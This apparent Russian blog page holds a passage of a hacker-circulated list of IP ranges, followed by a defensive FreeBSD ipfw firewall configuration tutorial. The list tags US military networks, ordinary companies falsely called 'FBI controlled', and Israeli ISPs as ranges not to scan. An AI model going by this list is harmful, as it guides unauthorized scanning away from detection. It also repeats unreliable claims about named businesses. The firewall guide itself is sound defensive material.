204.34.216.0 1st Marine Air Wing
204.34.217.0 SA-ALC/LTE
204.34.218.0 3rd Marine
204.34.219.0 Communications and Electronics
204.34.220.0 G-6 Operations
204.34.221.0 G-6 Operations
204.34.222.0 G-6 Operations
204.34.223.0 G-6 Operations
204.34.224.0 G-6 Operations
204.34.225.0 Joint Interoperability Test Command
204.34.226.0 NAVMASSO
204.34.227.0 NAVMASSO
204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
204.34.229.0 Naval Space Command
204.34.230.0 Naval Pacific Meteorology and Oceanography
204.34.232.0 Military Family Housing
204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
204.34.234.0 NAVMASSO
204.34.235.0 Defense Finance and Accounting Service
204.34.237.0 European Stars and Stripes
204.34.238.0 Pacific Stars and Stripes
204.34.239.0 PUGET SOUND NAVAL SHIPYARD
204.34.240.0 Nval Station, Guantanamo Bay
204.34.242.0 COMNAVSURFPAC
204.34.243.0 NAVMASSO
204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
204.34.245.0 USAF SpaceCommand
204.34.246.0 USAF
204.34.247.0 U.S. Army Special Operations Command
204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
204.34.249.0 Naval Aviation Depot North Island
204.34.250.0 NAVMASSO
204.34.251.0 NAVSEA Log Command Detachment Pacific
204.34.252.0 Command Special Boat Squadron One
204.34.253.0 AFPCA/GNNN
204.34.254.0 Navy Environmental Preventive Medicine

RANGE 205
205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
205.96.* - 205.103.*

RANGE 207
207.30.* Sprint/United Telephone of Florida

All the below are FBI controlled Linux servers & IPs/IP-Ranges

207.60.0.0 - 207.60.255.0 The Internet Access Company
207.60.2.128 - 207.60.2.255 Abacus Technology
207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
207.60.4.0 - 207.60.4.127 Northern Electronics
207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
207.60.5.64 - 207.60.5.127 Woodard & Curran
207.60.5.192 - 207.60.5.255 On Line Services
207.60.6.0 - 207.60.6.63 The 400 Group
207.60.6.64 - 207.60.6.127 RD Hunter and Company
207.60.6.128 - 207.60.6.191 Louis Berger and Associates
207.60.6.192 - 207.60.6.255 Ross-Simons
207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
207.60.8.0 - 207.60.8.255 Sippican
207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
207.60.9.32 - 207.60.9.63 Escher Group Ltd
207.60.9.64 - 207.60.9.95 West Suburban Elder
207.60.9.96 - 207.60.9.127 Central Bank
207.60.9.128 - 207.60.9.159 Danick Systems
207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
207.60.9.192 - 207.60.9.223 BSCC
207.60.13.16 - 207.60.13.23 Patrons Insurance Group
207.60.13.40 - 207.60.13.47 Athera Technologies
207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
207.60.13.64 - 207.60.13.71 SierraCom
207.60.13.72 - 207.60.13.79 AI/ FOCS
207.60.13.80 - 207.60.13.87 Extreme soft
207.60.13.96 - 207.60.13.103 Eaton Seo Corp
207.60.13.112 - 207.60.13.119 C. White
207.60.13.120 - 207.60.13.127 Athera
207.60.13.128 - 207.60.13.135 Entropic Systems, INC
207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
207.60.13.160 - 207.60.13.167 Jamestown Distribution
207.60.13.168 - 207.60.13.175 C&M Computers
207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
207.60.13.184 - 207.60.13.191 Tomas Weldon
207.60.13.192 - 207.60.13.199 Tage Inns
207.60.13.200 - 207.60.13.207 Control Module Inc
207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
207.60.13.216 - 207.60.13.223 Eastern Bearings
207.60.13.224 - 207.60.13.231 North Shore Data Services
207.60.13.232 - 207.60.13.239 Mas New Hampshire
207.60.14.0 - 207.60.14.255 J. A. Webster
207.60.15.0 - 207.60.15.127 Trilogic
207.60.16.0 - 207.60.16.255 Area 54
207.60.18.0 - 207.60.18.63 Vested Development Inc
207.60.18.64 - 207.60.18.127 Conventures
207.60.21.0 - 207.60.21.255 Don Law Company
207.60.22.0 - 207.60.22.255 Advanced Microsensors
207.60.28.0 - 207.60.28.63 Applied Business Center
207.60.28.64 - 207.60.28.127 Color and Design Exchange
207.60.36.8 - 207.60.36.15 Shaun McCusker
207.60.36.16 - 207.60.36.23 Town of Framingham
207.60.36.24 - 207.60.36.31 AB Software
207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
207.60.36.40 - 207.60.36.47 Next Ticketing
207.60.36.48 - 207.60.36.55 Dulsi
207.60.36.56 - 207.60.36.63 The Internet Access Company
207.60.36.64 - 207.60.36.71 Maguire Group
207.60.36.72 - 207.60.36.79 Cogenex
207.60.36.88 - 207.60.36.95 AKNDC
207.60.36.96 - 207.60.36.103 McGovern election commitee
207.60.36.104 - 207.60.36.111 Digital Equipment Corp
207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
207.60.36.120 - 207.60.36.127 Extech
207.60.36.128 - 207.60.36.135 Manfreddi Architects
207.60.36.144 - 207.60.36.151 Parent Naffah
207.60.36.152 - 207.60.36.159 Darling Dolls Inc
207.60.36.160 - 207.60.36.167 Wright Communications
207.60.36.168 - 207.60.36.175 Principle Software
207.60.36.176 - 207.60.36.183 Chris Pet Store
207.60.36.184 - 207.60.36.191 Fifteen Lilies
207.60.36.192 - 207.60.36.199 All-Com Technologies
207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
207.60.37.96 - 207.60.37.127 Nelson Copy Supply
207.60.37.128 - 207.60.37.159 Boston Optical Fiber
207.60.37.192 - 207.60.37.223 Fantasia&Company
207.60.41.0 - 207.60.41.255 Infoactive
207.60.48.0 - 207.60.48.255 Curry College
207.60.62.32 - 207.60.62.63 Alternate Power Source
207.60.62.64 - 207.60.62.95 Keystone Howley-White
207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
207.60.62.160 - 207.60.62.191 County Supply
207.60.62.192 - 207.60.62.223 NH Board of Nursing
207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
207.60.64.64 - 207.60.64.127 Phytera
207.60.66.0 - 207.60.66.15 The Network Connection
207.60.66.16 - 207.60.66.31 Young Refrigeration
207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
207.60.66.48 - 207.60.66.63 EffNet Inc
207.60.66.64 - 207.60.66.79 Entropic Systems Inc
207.60.66.80 - 207.60.66.95 Finley Properties
207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
207.60.66.128 - 207.60.66.143 Textnology Corp
207.60.66.144 - 207.60.66.159 Groton Neochem LLC
207.60.66.160 - 207.60.66.175 Tab Computers
207.60.66.176 - 207.60.66.191 Patrons Insurance
207.60.66.192 - 207.60.66.207 Chair City Web
207.60.66.208 - 207.60.66.223 Radex, Inc.
207.60.66.224 - 207.60.66.239 Robert Austein
207.60.66.240 - 207.60.66.255 Hologic Inc.
207.60.71.64 - 207.60.71.127 K-Tech International Inc.
207.60.71.128 - 207.60.71.191 Pan Communications
207.60.71.192 - 207.60.71.255 New England College of Finance
207.60.75.128 - 207.60.75.255 Absolve Technology
207.60.78.0 - 207.60.78.127 Extech
207.60.78.128 - 207.60.78.255 The Insight Group
207.60.83.0 - 207.60.83.255 JLM Technologies
207.60.84.0 - 207.60.84.255 Strategic Solutions
207.60.94.0 - 207.60.94.15 McWorks
207.60.94.32 - 207.60.94.47 Rooney RealEstate
207.60.94.48 - 207.60.94.63 Joseph Limo Service
207.60.94.64 - 207.60.94.79 The Portico Group
207.60.94.80 - 207.60.94.95 Event Travel Management Inc
207.60.94.96 - 207.60.94.111 Intellitech International
207.60.94.128 - 207.60.94.143 Orion Partners
207.60.94.144 - 207.60.94.159 Rainbow Software Solution
207.60.94.160 - 207.60.94.175 Grason Stadler Inc
207.60.94.192 - 207.60.94.207 Donnegan System
207.60.95.1 - 207.60.95.255 The Iprax Corp
207.60.102.0 - 207.60.102.63 Coporate IT
207.60.102.64 - 207.60.102.127 Putnam Technologies
207.60.102.128 - 207.60.102.191 Sycamore Networks
207.60.102.192 - 207.60.102.255 Bostek
2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
207.60.104.128 - 207.60.104.191 Hanson Data Systems
207.60.106.128 - 207.60.106.255 Giganet Inc.
207.60.107.0 - 207.60.107.255 Roll Systems
207.60.108.8 - 207.60.108.15 InternetQA
207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
207.60.111.32 - 207.60.111.63 Edco collaborative
207.60.111.64 - 207.60.111.95 DTC Communications Inc
207.60.111.96 - 207.60.111.127 Mike Line
207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
207.60.111.160 - 207.60.111.191 Caton Connector
207.60.111.192 - 207.60.111.223 Refron
207.60.111.224 - 207.60.111.255 Dolabany Comm Group
207.60.112.0 - 207.60.112.255 The CCS Companies
207.60.116.0 - 207.60.116.255 Continental PET Technologies
207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
207.60.122.24 - 207.60.122.31 SAIC
207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
207.60.122.40 - 207.60.122.47 Avici Systems Inc
207.60.122.48 - 207.60.122.55 Webrdwne
207.60.122.56 - 207.60.122.63 Reality and Wonder
207.60.122.64 - 207.60.122.71 Nishan Desilva
207.60.122.72 - 207.60.122.79 NemaSoft Inc
207.60.122.80 - 207.60.122.87 Patrick Murphy
207.60.122.88 - 207.60.122.95 Corey and Company
207.60.122.96 - 207.60.122.103 Ames Textile Corp
207.60.122.104 - 207.60.122.111 Publicom
207.60.127.0 - Northstar Technologies
207.60.128.0 - 207.60.128.255 Northstar Technologies
207.60.129.0 - 207.60.129.255 Sanga Corp
207.60.129.64 - 207.60.129.127 Fired Up Network
207.60.129.128 - 207.60.129.191 Integrated Data Solutions
207.60.129.192 - 207.60.129.255 Metanext
207.61.* WorldLinx Telecommunications, Inc., Canada
207.120.* BBN Planet, MA

RANGE 208
208.240.xxx.xxx

RANGE 209
209.35.* Interland, Inc., GA

RANGE 212
212.56.107.22
212.143 *** israelis isp's!! dont try those ranges!!
212.149.*** israelis isp's!! dont try those ranges!!
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.33.56
212.159.40.211
212.159.41.173
212.179.*** israelis isp's!! dont try those ranges!!
212.208.0.12.*** israelis isp's!! dont try those ranges!!

RANGE 213
213.8.***.*** israelis isp's!! dont try those ranges!!

RANGE 216
216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
217.6.* Do not scan

Метки:  

Расширенная конфигурация ipfw (ipfw firewall freebsd)

Воскресенье, 26 Июня 2011 г. 23:44 + в цитатник
Оригинал: http://kes.net.ua/softdev/advanced_firewall.html

Обычная конфигурация

Большинство примеров в интернете показывают "плоскую" конфигурацию
файрвола
ipfw 10 add divert 8778 ip from 3.3.3.0/24 to 6.6.6.0/24
ipfw 20 add divert 8668 ip from 3.3.3.0/24 to any
ipfw 30 add divert 8668 ip from 4.4.4.0/24 to 5.5.5.0/24
ipfw 40 add divert 8778 ip from 4.4.4.0/24 to any
ipfw 50 add fwd 1.1.1.254 ip from 1.1.1.1 to any
ipfw 60 add fwd 2.2.2.254 ip from 2.2.2.2 to any
ipfw 70 add divert 8668 ip from any to 1.1.1.1
ipfw 80 add divert 8778 ip from any to 2.2.2.2


Пример со статьи: http://ipfw.ism.kiev.ua/pbr.html

Прошу заметить. Статья очень хорошо показывает как работает nat и как
можно распределять трафик по разным каналам от разных сетей. Не побоюсь
назвать этот пример идеальным.
Респект автору! http://ipfw.ism.kiev.ua/nipfw.html
#!/bin/sh

ipfw='/sbin/ipfw -q'
ournet='192.168.0.1/24'
uprefix='192.168.0'
ifout='rl0'
ifuser='rl1'

${ipfw} flush

${ipfw} add 100 check-state

${ipfw} add 200 deny icmp from any to any in icmptype 5,9,13,14,15,16,17
${ipfw} add 210 reject ip from ${ournet} to any in via ${ifout}

${ipfw} add 300 allow ip from any to any via lo
${ipfw} add 310 allow tcp from me to any keep-state via ${ifout}
${ipfw} add 320 allow icmp from any to any
${ipfw} add 330 allow udp from me to any domain keep-state
${ipfw} add 340 allow udp from any to me domain
${ipfw} add 350 allow ip from me to any

${ipfw} add 400 allow tcp from any to me http,https,ssh
${ipfw} add 410 allow tcp from not ${ournet} to me smtp

${ipfw} add 500 fwd 127.0.0.1,3128 tcp from ${ournet} to any http out via ${ifout}
${ipfw} add 510 divert natd ip from ${ournet} to any out via ${ifout}
${ipfw} add 511 divert natd ip from any to ${REAL_IP} in via ${ifout}

${ipfw} add 1002 allow ip from ${uprefix}.2 to any via ${ifuser}
${ipfw} add 1002 allow ip from any to ${uprefix}.2 via ${ifuser}
${ipfw} add 1003 allow ip from ${uprefix}.3 to any via ${ifuser}
${ipfw} add 1003 allow ip from any to ${uprefix}.3 via ${ifuser}
${ipfw} add 1004 allow ip from ${uprefix}.4 to any via ${ifuser}
${ipfw} add 1004 allow ip from any to ${uprefix}.4 via ${ifuser}

#${ipfw} add 65535 deny ip from any to any


Плоская, потому что любой трафик проходит ВСЕ! правила файрвола, даже
через те правила, которые не предназначались для данного пакета.
Например в 1-м примере для пакета 4.4.4.5 -> I.N.E.T который получен с
интерфейса rl2 и будет направлен в интернет пройдёт 6 проверок (75%
всех правил) из который нужных только 2 (25%). И ответ I.N.E.T ->
2.2.2.2 (I.N.E.T -> 4.4.4.5 после undiverta) пройдёт все правила
(100%), из которых нужная только одна (12%).

Для сравнения в примере 2 эффективность файрвола ещё меньше. Для пакета
192.168.0.4 -> I.N.E.T делается 13 проверок (68%), из которых 2
полезных (10%). И для ответа I.N.E.T -> 192.168.0.4 19 проверок (100%),
из которых нужных тоже 2 (10%)

Также обратите внимание что в оригинале пропущен обратный диверт, нет правила
${ipfw} add 511 divert natd ip from any to ${REAL_IP} in via ${ifout}
где ${REAL_IP} это ИП адрес на ${ifout} интерфейсе (в данном случае rl0)
Без этого правила трафик не сможет вернуться обратно и будет отвергнут
65535-м правилом

Учитывая тот факт, что файрвол имеет тенденцию разрастаться, то со
временем количество ненужных проверок будет расти и соответственно
производительность падать. А это ненужные задержки... Как бы то нибыло
с задержками можно ещё смирится или например поставить более
производительное железо. Но с фактом быстрого роста сложноти файвола Вы
не поспорите никак. Очень частая ошибка будет свзяна с тем, что Вы
будет забывать указывать in recv/out xmit/via ${iface} и трафик будет
дропаться/дивертиться/форвардится не туда куда нужно и Вы будете
тратить часы сидя с tcpdump'ом, чтобы найти куда же ушел пакет или
почему он не возвращается.


Открытый файрвол VS Закрытый файрвол

По умолчанию при загрузке системы firewall находится в режиме "никому
ничего нельзя", т.е. весь трафик блокируется. Я бы не советовал
пересобирать ядро с опцией IPFIREWALL_DEFAULT_TO_ACCEPT. Т.к. в этом
случае Ваш файрвол будет похож на большую дыру =) и, фактически, в этом
случае Вы ничего не контролируете. Каждый более менее продвинутый
пользователь сможет получить халявный трафик! Вы можете попытаться
блокировать не нужный трафик, тогда у Вас выйдето что-то вроде:
ipfw add xxx deny all from 192.168.0.0/16 to any
ipfw add xxx deny all from 172.16.0.0/12 to any
... и другие возможные блокировки
ipfw add 65535 allow all from any to any


Поверьте всё не заблокируете. Также давайте будем исходить из того
факта, что если у Вас что-то не работает. Т.е. Вы забыли разрешить
нужный трафик, то пользователи Вашей сети или сотрудники предприятия
обратятся к Вам с этой проблемой и Вы сможете исправить ситуацию.
Однако злобный пользователь, который юзает Ваш роутер для своих мерзких
целей никогда НИКОГДА не прийдёт к Вам и не скажет, что мол вот у тебя
дырочка и ты терпишь убытки. Поэтому предпочтение лучше отдать
закрытому файрволу. т.е. по умолчанию блокируем любой трафик
ipfw add 65535 deny all from any to any


Разделяй и властвуй

Идея построения улучшенного файрвола базируется на принципе "Разделяй и
властвуй". Нужно разделить трафик по интерфейсам и рулить "потоком"
отдельно на каждом интерфейсе.
ipfw add 09999 skipto 10000 all from any to any via em
ipfw add 09999 skipto 11000 all from any to any via rl0
ipfw add 09999 skipto 12000 all from any to any via rl1
ipfw add 09999 skipto 13000 all from any to any via rl2
ipfw add 09999 skipto 65000 ip from any to any

ipfw add 10999 skipto 65000 ip from any to any
ipfw add 11999 skipto 65000 ip from any to any
ipfw add 12999 skipto 65000 ip from any to any
ipfw add 13999 skipto 65000 ip from any to any


Таким образом мы получаем что трафик с разных интерфейсов не
пересекается и также получаем возможность работать с каждым интерфейсом
как бы изолированно. Диапазон 00001-99998 можно использовать по своему
усмотрению. Например мы не используем сеть 10.0.0.0/8 и поэтому
блокируем её на ВСЕХ интерфейсах. Или например мы хотим заблокировать
icmp трафик на всех интерфейсах, поэтому мы пишем
ipfw add 9010 deny all from 10.0.0.0/8 to any
ipfw add 9010 deny icmp from any to any


Также этот диапазон можно использовать для счётчиков.
ВАЖНО!!! Всегда считайте до того, как Вы заблокируете какой либо вид
трафика. Иначе Вы рискуете потерять часть статистики.
ipfw add 910 deny tcp from any 135 to any in recv ng0
ipfw add 910 count tcp from any to any in recv ng0


В данном случае Вы не посчитатете трафик на 135 порту от клиента, хотя
по сути клиент загрузил часть канала. В итоге Вы не дополучаете
некоторую сумму, когда клиент расчитывается с Вами за интернет.


Распределение диапазона 00001-09999

00001- 00089 зарезервировано. Всегда нужно иметь такой пустой диапазон.
Обычно использую для тестирования или когда необходимо на гарячую
что-то сделать с трафиком. Например остановить флуд: ipfw add 1 deny
all from any 135 to any

00090 - 00099 для глобальных (на всех интерфейсах) блокировок.
ЗАМЕТЬТЕ: Трафик заблокированный здесь НЕ БУДЕТ посчитан!

00100 - 00899 использую для подсчёта трафика.

00900 - 00999 Для глобальных блокировок. ЗАМЕТЬТЕ: Трафик
заблокированный здесь БУДЕТ посчитан.

01000 - 09998 Испольуйте этот диапазон на своё усмотрение

09999 Служит для деления трафика по интерфейсам. По умолчанию последнее
должно быть ipfw add 09999 skipto 65000 ip from any to any

10000 - 10999 Правила для интерфейса lo

11000 - 11999 Правила для интерфейса 1

11000 - 11999 Правила для интерфейса 2 ...

64000 - 64999 Правила для интерфейса 2

65000 - 65534 Правила блокировки по умолчания и/или логирования

65535 блокировка по умолчанию

ЗАМЕТКИ:
а) 5 цифр в номере использую только для визуального оформления, поэтому
00001 0001 001 и 1 это одно и

б) Последнее правило для каждого интерфейса хх999 должно быть ipfw add
хх999 skipto 65000 ip from any to any
Это нужно для того, чтобы проверить правильность конфигурации правил
для интерфейса. Запомните! через это хх999 правило не должен
проскользнуть ни один пакет и поэтому если коунтер на этом правиле не
равен нулю, что значит что-то Вы упустили. Как узнать, что именно было
сделано не верно я раскажу ниже. (см. хх998 правило)


Написание правил для интерфейса

И так для правил интерфейса у нас имеется диапазон xx000 - xx998
xx999 правило должно быть ipfw add хх999 skipto 65000 ip from any to any
Каждое сотое правило зарезервировано ххy00: хх100, хх200, ..., хх900

хх000 - хх099 зарезервировано. Также как и для правил 00001- 00089
используется для "гарячих" целей или тестирования

хх101 - хх199 блокируем весь нежелательный трафик здесь. Например если
на интерфейсе висит сеть 192.168.0.0/24, то дропаем всё, что не с этой сети:
ipfw add 11101 deny all from not 192.168.0.0/24 to any in recv rl0


хх201 - хх299 этот диапазон идеален для правил подсчета (count) трафика
для исхода, тк. здесь трафик ещё не попал в диверт (виден src-ip)

xx301 - xx399 здесь можно расположить skipto xx500 правила, если мы не
хотим чтобы они попадали в очередь и/или шейпер. Однако этого я бы не
рекомендовал делать. (см Как не нужно делать)

хх401 - хх499 ложим исходящий трафик в очередь и/или канал. Вы должны
сделать это до диверта, тк. после диверта весь исходящий трафик получит
Ваш внешний ИП и Вы не сможете распределить канал между локальными
пользователями. А до виверта Вы можете сделать это по src-ip.

хх501 - хх599 дивертим входящий/исходящий трафик тут.

хх601 - хх699 этот диапазон идеален для правил подсчета (count) трафика
для входа, тк. здесь трафик ещё уже прошел диверт (виден dst-ip)

хх701 - хх799 здесь можно расположить skipto хх900 правила, если мы не
хотим чтобы они попали в очередь и/или шейпер. Однако этого я бы не
рекомендовал делать. (см. Как не нужно делать)

хх801 - хх899 ложим входящий трафик в очередь и/или канал. Вы должны
сделать это после диверта, тк. до диверта весь входящий трафик имеет
Ваш внешний IP и Вы не сможете распределить канал между локальными
пользователями. А после диверта Вы можете сделать это по dst-ip. (см.
Недостатки ALTQ)

хх901 - хх997 разрешающие правила. Т.к. у нас файрвол закрытый, то это
обязательная часть файрвола, где мы должны указать какой трафик
разрешен. Если это внешний интерфейс, то разрешаем трафик на Ваш
реальный IP I.N.E.T:
ipfw add 11903 allow all from I.N.E.T to any out xmit rl0
ipfw add 11903 allow all from any to I.N.E.T in recv rl0


Если это внутренний интерфейс 192.168.0.1/255.255.255.0 (ака локальная
сеть), то разрешаем сеть:
ipfw add 11903 allow all from 192.168.0.0/24 to 192.168.0.1 in recv rl1
ipfw add 11903 allow all from 192.168.0.1 to 192.168.0.0/24 out xmit rl1


Здесь я использую один номер для всех правил, для экономии номеров.
Кроме экономии я ещё показываю однотипность правил, показываю то, что
все эти правила выполняют одинаковую работу, то, что не важно в каком
порядке они выполняются.

Такие логические блоки можно отделять друг от друга с шагом 5 или 10. В
зависимости от количества таких блоков. Обычно 6-8 блоков хватает,
поэтому для каждого выделяю номера (шаг10) ххх03, ххх13, ххх23 и тд.
Сплошную нумерацию лучше не делать: ххх01, ххх02, ххх03, т.к. если Вам
понадобиться срочно добавлять/удалять какое-либо правило между ххх01 и
ххх02, Вам прийдется помучатся с передобавлением ххх01 правил. Чего Вы
избежите, когда у Вас будут пустые номера между группами. По мере
заполнения этого пространства не забывайте каждые месяц/пол года
перенумеровывать правила с шагом 5/10. Это избавит Вас от лишней работы
в критические ситуации.

хх998 здесь должно быть правило: deny log all from any to any via IFACE
Этим правилом мы облегчаем себе жизнь в разы. Любой трафик который мы
не учли будет попадать в лог /var/log/security
Jun 21 15:58:02 kes kernel: ipfw: 10998 Deny ICMP:5.1 10.0.16.3 172.16.128.61 in via rl0
Jun 21 15:58:02 kes kernel: ipfw: 10998 Deny ICMP:5.1 10.0.16.3 172.16.128.61 in via rl0


И если у Вас правильно настроена ротация лог файлов
/etc/newsyslog.conf, стандартный конфиг это:
/var/log/security 600 10 100 * JC
то можно не боятся что файловая система будет переполнена =)

хх999 здесь должно быть правило: skipto 65000 ip from any to any
Весь трафик который вы не учли попадёт на 65000 - 65535 правила.
НЕ ЛЕНИТЕСЬ НАПИШИТЕ ЭТО ПРАВИЛО. ДАЖЕ ЕСЛИ ВЫ УВЕРЕНЫ, ЧТО хх998
ПРАВИЛО ОБРАБОТАЕТ ВСЕ СЛУЧАИ.
ПОТОМУ ЧТО БОГ ЗНАЕТ В КАКОМ СОСТОЯНИИ ПРИЙДЕТСЯ ВАМ ПРАВИТЬ ФАЙРВОЛЛ =)

ВНИМАНИЕ!!!
Также обязательно в конце правила обязательно указывайте направление и интерфейс.
Это съэкономит время на ловке ошибок при конфигурации файрвола.
Поверьте, это экономит время!

Ну и последнее правило должно быть:
65534 ipfw add deny log all from any to any


Собираем всё до кучи.

Для удобства, правила для каждого интерфеса ложите в отдельный файл
называнный именем этого интерфейса: rl0, rl1, em0, ng*. Здесь ng* это
VPN пул. Для того чтобы не писать кучу одинаковых ng0, ng1 ... ngX я
назвал этот общий файл "ng*", можно было назвать "ng". Но это на
любителя =)

Теперь создадим файл файрвола:
# mkdir /usr/local/etc/firewall
# cd /usr/local/etc/firewall
# touch firewall
# chmod 700 firewall


И сам скрипт:
#!/bin/sh
#первый параметр к скрипту это start|stop|reload

#разрешаем задать путь к ipfw
if [ -n "${2}" ]; then
fwcmd=${2}
else
fwcmd="/sbin/ipfw" #если ничего не задали
fi

workDir="/usr/local/etc/firewall"

start () {

#This rule set are independed. So run it first.
#Загружаем файл с набором каналов
. $workDir/f-pipes.ipfw

#We wanna count something???
#файл с набором коунтеров
if [ -f $workDir/f-count.ipfw ]; then
. $workDir/f-count.ipfw
fi

#Файл с набором по умолчанию
if [ -f /$workDir/f-defaults.ipfw ]; then
num=00
. $workDir/f-defaults.ipfw
fi

#Интерфейс rl0 имеет нумерацию на 10000, поэтому num = 10
num=10
. $workDir/f_rl0
#Интерфейс tun0 имеет нумерацию на 11000, поэтому num = 11
num=11
. $workDir/f_tun0
num=13
. $workDir/f_ng*

#Обратите внимание наличие точки и пробела в комманде ". $workDir/f_tun0" обязательно
#Без них работать ничего не будет

#this rule must be runned last to be the last record in 9999 rule
#по умолчанию весь трафик идет на 65000 правила
${fwcmd} add 9999 skipto 65000 all from any to any
#по умолчанию дропаем всё и пишем в лог
${fwcmd} add 65534 deny log all from any to any

}

#удаляем все правила, пайпы, очереди
stop () {
${fwcmd} -f flush
${fwcmd} -f pipe flush
${fwcmd} -f queue flush
}

#Разрешаем работу обратной петли. правило 99!
setup_loopback () {
############
# Only in rare cases you want to change these rules
#
${fwcmd} add 99 pass all from any to any via lo0
${fwcmd} add 99 deny all from any to 127.0.0.0/8
${fwcmd} add 99 deny ip from 127.0.0.0/8 to any
}

#Статистика перезапуска файрвола =)
echo `date` >> /etc/reboot

case ${1} in
start)
setup_loopback
start
;;
stop)
stop
;;
reload)
stop
setup_loopback
start
;;
*)
echo "Usage: `basename ${0}` { start | stop | reload& } "
echo "WARNING!!! WARNING!!! WARNING!!! WARNING!!! WARNING!!!"
echo "Don't foget to add '&' if you reload the firewall remoutly"
;;
esac


Если Вы захотите перезагрузить файрвол с помощью этого скрипта
удалённо, то ОБЯЗАТЕЛЬНО добавьте в конец команды знак & чтобы скрипт
выполнялся в фоне. Иначе когда удалятся правила Ваша сессия сбросится и
выполнение скрипта остановится.
Таким образом вы отрежите себе путь к серверу :`-((

Теперь по поводу правил для интерфейсов:
# touch f-count.ipfw
# touch f-pipes.ipfw
# touch "f_ng*"
# touch f_rl0
# touch f_tun0


Обязательная шапка для всех файлов:
#!/bin/sh
iface="имя_интерфейса"

#перенаправляем трафик с общего потока на правила которые отвечают за интерфейс ${iface}
${fwcmd} add 9999 skipto ${num}000 all from any to any via "${iface}"


Если присваивать имя интерфейса переменной и не писать имя интерфейса в
каждом правиле, то мы экономим время, если меняется имя интерфейса,
например с rl2 -> em0, а логически подключение остаётся тоже. Тогда
просто заходим и меняем имя в одном месте ;-)

Значения переменных $fwcmd и $num устанавливаются в скрипте firewall
Итак кусочек файрвола для ng*

f_ng
#!/bin/sh
iface="имя_интерфейса"

#перенаправляем трафик с общего потока на правила которые отвечают за интерфейс ${iface}
${fwcmd} add 9999 skipto ${num}000 all from any to any via "${iface}"

#на VPN пул выдаются адреса с сети 192.168.0.0/16, поэтому всё что не наше дропаем
#Фактически весь не разрешенный трафик убъётся хх998 правилом, но делая это здесь Вы выигрываете в производительности
${fwcmd} add ${num}101 deny all from not 192.168.0.0/16 to any in recv "${iface}"

#Шейпим
${fwcmd} add ${num}406 pipe 1 all from 192.168.7.0/24 to any in recv "${iface}"
${fwcmd} add ${num}406 pipe 2 all from any to 192.168.7.0/24 out xmit "${iface}"
${fwcmd} add ${num}406 pipe 3 all from 192.168.8.0/24 to any in recv "${iface}"
${fwcmd} add ${num}406 pipe 4 all from any to 192.168.8.0/24 out xmit "${iface}"
${fwcmd} add ${num}406 pipe 5 all from 192.168.5.0/24 to any in recv "${iface}"
${fwcmd} add ${num}406 pipe 6 all from any to 192.168.5.0/24 out xmit "${iface}"

#Разрешаем трафик
${fwcmd} add ${num}901 allow all from any to 192.168.0.0/16 out xmit "${iface}"
${fwcmd} add ${num}902 allow all from 192.168.0.0/16 to any in recv "${iface}"

#Дропаем всё ненужное
${fwcmd} add ${num}998 deny log all from any to any via "${iface}"
${fwcmd} add ${num}999 skipto 65000 all from any to any


f_rl0
#!/bin/sh

iface="rl0"

#Isolate traffic via "${iface}" for decrease number of passing via firewall rules
${fwcmd} add 9999 skipto ${num}000 all from any to any via "${iface}"

#DENY all unwanted traffic
${fwcmd} add ${num}101 deny all from 192.168.0.0/16to any in recv "${iface}"
${fwcmd} add ${num}101 deny all from 172.16.0.0/12 to any in recv "${iface}"

#Даём приоритет для VPN трафика над локальным
${fwcmd} add ${num}401 queue 31 gre from 10.0.0.0/8 to 10.0.0.0/8 out xmit "${iface}"
${fwcmd} add ${num}401 queue 32 not gre from 10.0.0.0/8 to 10.0.0.0/8 out xmit"${iface}"

${fwcmd} add ${num}801 queue 33 gre from 10.0.0.0/8 to 10.0.0.0/8 in recv "${iface}"
${fwcmd} add ${num}801 queue 34 not gre from 10.0.0.0/8 to 10.0.0.0/8 in recv "${iface}"

#ALLOW rules
${fwcmd} add ${num}901 allow all from I.N.E.T to any out xmit "${iface}"
${fwcmd} add ${num}902 allow all from any to I.N.E.T in recv "${iface}"

#Allow LAN traffic
${fwcmd} add ${num}904 allow all from any to 10.11.0.0/16 via "${iface}"
${fwcmd} add ${num}904 allow all from any to 10.10.0.0/16 via "${iface}"
#для работы samba, нужны броадкасты
#Здесь направление может быть любое, поэтому я ставлю via
${fwcmd} add ${num}906 allow all from any to 255.255.255.255 via "${iface}"
${fwcmd} add ${num}906 allow all from 255.255.255.255 to any via "${iface}"

#по аналогии
#Deny all other traffic
${fwcmd} add ${num}998 deny log all from any to any via "${iface}"
